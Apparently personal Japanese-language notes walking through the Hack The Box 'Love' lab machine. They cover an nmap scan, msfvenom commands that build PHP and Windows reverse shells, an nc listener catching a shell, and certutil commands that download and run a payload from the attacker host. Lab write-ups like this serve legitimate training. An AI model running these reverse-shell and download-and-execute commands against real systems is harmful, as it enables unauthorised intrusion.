🐥
LOVE_HTB
Machine
Scan
- コマンド
sudo nmap -Pn -sV -T4 10.10.10.239
- 結果
┌──(kali㉿kali)-[~]
└─$ sudo nmap -Pn -sV -T4 10.10.10.239
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-11-28 07:11 EST
Nmap scan report for 10.10.10.239
Host is up (0.33s latency).
Not shown: 993 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql?
5000/tcp open http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.93%I=7%D=11/28%Time=6565D8DC%P=x86_64-pc-linux-gnu%r(N
SF:ULL,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.16\.10'\x20is\x20not\x20allo
SF:wed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(GenericLine
SF:s,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.16\.10'\x20is\x20not\x20allowe
SF:d\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(GetRequest,4A
SF:,"F\0\0\x01\xffj\x04Host\x20'10\.10\.16\.10'\x20is\x20not\x20allowed\x2
SF:0to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(HTTPOptions,4A,"F
SF:\0\0\x01\xffj\x04Host\x20'10\.10\.16\.10'\x20is\x20not\x20allowed\x20to
SF:\x20connect\x20to\x20this\x20MariaDB\x20server")%r(RTSPRequest,4A,"F\0\
SF:0\x01\xffj\x04Host\x20'10\.10\.16\.10'\x20is\x20not\x20allowed\x20to\x2
SF:0connect\x20to\x20this\x20MariaDB\x20server")%r(RPCCheck,4A,"F\0\0\x01\
SF:xffj\x04Host\x20'10\.10\.16\.10'\x20is\x20not\x20allowed\x20to\x20conne
SF:ct\x20to\x20this\x20MariaDB\x20server")%r(DNSVersionBindReqTCP,4A,"F\0\
SF:0\x01\xffj\x04Host\x20'10\.10\.16\.10'\x20is\x20not\x20allowed\x20to\x2
SF:0connect\x20to\x20this\x20MariaDB\x20server")%r(Help,4A,"F\0\0\x01\xffj
SF:\x04Host\x20'10\.10\.16\.10'\x20is\x20not\x20allowed\x20to\x20connect\x
SF:20to\x20this\x20MariaDB\x20server")%r(TerminalServerCookie,4A,"F\0\0\x0
SF:1\xffj\x04Host\x20'10\.10\.16\.10'\x20is\x20not\x20allowed\x20to\x20con
SF:nect\x20to\x20this\x20MariaDB\x20server")%r(TLSSessionReq,4A,"F\0\0\x01
SF:\xffj\x04Host\x20'10\.10\.16\.10'\x20is\x20not\x20allowed\x20to\x20conn
SF:ect\x20to\x20this\x20MariaDB\x20server")%r(X11Probe,4A,"F\0\0\x01\xffj\
SF:x04Host\x20'10\.10\.16\.10'\x20is\x20not\x20allowed\x20to\x20connect\x2
SF:0to\x20this\x20MariaDB\x20server")%r(LPDString,4A,"F\0\0\x01\xffj\x04Ho
SF:st\x20'10\.10\.16\.10'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x
SF:20this\x20MariaDB\x20server")%r(LDAPSearchReq,4A,"F\0\0\x01\xffj\x04Hos
SF:t\x20'10\.10\.16\.10'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x2
SF:0this\x20MariaDB\x20server")%r(LDAPBindReq,4A,"F\0\0\x01\xffj\x04Host\x
SF:20'10\.10\.16\.10'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20th
SF:is\x20MariaDB\x20server")%r(SIPOptions,4A,"F\0\0\x01\xffj\x04Host\x20'1
SF:0\.10\.16\.10'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x
SF:20MariaDB\x20server");
Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.34 second
Initial Access
-
hosot準備
sudo echo "10.10.10.239 www.love.htb staging.love.htb" > /etc/hosts
-
Webアクセス(www.love.htb)
-
Webアクセス(staging.love.htb)
-
Webアクセス(staging.love.htb/beta.php)
-
Webアクセス(www.love.htb/admin)
Make Shell
-
Ready
-
make reverce.php
msfvenom -p php/reverse_php LHOST=<ip address> LPORT=<your port> -f raw > phpreverseshell.php
- 結果
┌──(kali㉿kali)-[~/love] └─$ msfvenom -p php/reverse_php LHOST=10.10.14.54 LPORT=135 -f raw > phpreverseshell.php [-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload [-] No arch selected, selecting arch: php from the payload No encoder specified, outputting raw payload Payload size: 3027 bytes
- 結果
-
upload reverce.php
以下修正
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.54 LPORT=445 -f exe > revshell.exe
┌──(kali㉿kali)-[~/love]
└─$ nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.16.10] from (UNKNOWN) [10.10.10.239] 54044
whoami
love\phoebe
dir
Volume in drive C has no label.
Volume Serial Number is 56DE-BA30
Directory of C:\xampp\htdocs\omrs\images
11/28/2023 06:53 AM <DIR> .
11/28/2023 06:53 AM <DIR> ..
05/18/2018 07:10 AM 4,240 facebook-profile-image.jpeg
04/12/2021 02:53 PM 0 index.html.txt
01/26/2021 11:08 PM 844 index.jpeg
11/28/2023 06:53 AM 3,038 phpreverseshell.php
08/24/2017 03:00 AM 26,644 profile.jpg
11/28/2023 06:49 AM 7,168 revshell.exe
6 File(s) 41,934 bytes
2 Dir(s) 3,905,249,280 bytes free
certutil.exe -urlcache -split -f http://10.10.16.10/revshell.exe revshell.exe
**** Online ****
CertUtil: -URLCache command FAILED: 0x80072efd (WinHttp: 12029 ERROR_WINHTTP_CANNOT_CONNECT)
CertUtil: A connection with the server could not be established
certutil.exe -urlcache -split -f http://10.10.16.10:8080/revshell.exe revshell.exe
**** Online ****
0000 ...
1c00
CertUtil: -URLCache command completed successfully.
dir
Volume in drive C has no label.
Volume Serial Number is 56DE-BA30
Directory of C:\xampp\htdocs\omrs\images
11/28/2023 06:53 AM <DIR> .
11/28/2023 06:53 AM <DIR> ..
05/18/2018 07:10 AM 4,240 facebook-profile-image.jpeg
04/12/2021 02:53 PM 0 index.html.txt
01/26/2021 11:08 PM 844 index.jpeg
11/28/2023 06:53 AM 3,038 phpreverseshell.php
08/24/2017 03:00 AM 26,644 profile.jpg
11/28/2023 06:55 AM 7,168 revshell.exe
6 File(s) 41,934 bytes
2 Dir(s) 3,905,241,088 bytes free
.\revshell.exe
Discussion